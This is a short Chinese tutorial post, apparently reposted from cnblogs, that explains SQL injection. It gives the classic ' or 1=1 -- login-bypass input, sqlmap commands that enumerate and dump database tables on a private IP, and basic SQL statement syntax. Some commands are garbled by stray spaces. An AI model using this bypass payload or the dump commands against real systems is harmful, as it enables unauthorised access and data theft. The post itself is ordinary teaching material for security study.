码迷,mamicode.com
首页 > 数据库 > 详细

sql注入原理

时间:2019-11-10 22:33:50      阅读:97      评论:0      收藏:0      [点我收藏+]

标签:dmi   基础   focus   update   ade   str   mod   sql语句   into   

sql注入原理

登录SQL语句:

select * from admin where username = ‘用户输入的用户名‘ and password =用户输入的密码

用户输入的内容可由用户自行控制,例如可以输入‘or 1=1 --空格

SQL语句:

select * from admin where username=‘ or 1=1 -- ‘ and password = ‘用户输入的密码‘

sqlmap

使用sqlmap探测注入点

sqlmap -u "192.168.1.104: 8081/ cms/articles.php?id=1" - dbs 
?
sqlmap -u "192. 168.1.104 : 8081/ cms/articles. php?id=1" -D 数据库 -T 表名 -C 字段1, 字段2 --dump

sql基础(增删改查)


?
INSERT INTO 表(字段1,字段2) VALUES (值1,值2);
?

?
DELETE FROM 表 where 条件;
?

?
UPDATE 表 SET 列1=值1,列2=值2 WHERE 条件
?

?
select 字段1,字段2 from 表 where 条件

sql注入原理

标签:dmi   基础   focus   update   ade   str   mod   sql语句   into   

原文地址:https://www.cnblogs.com/miansj/p/11832112.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!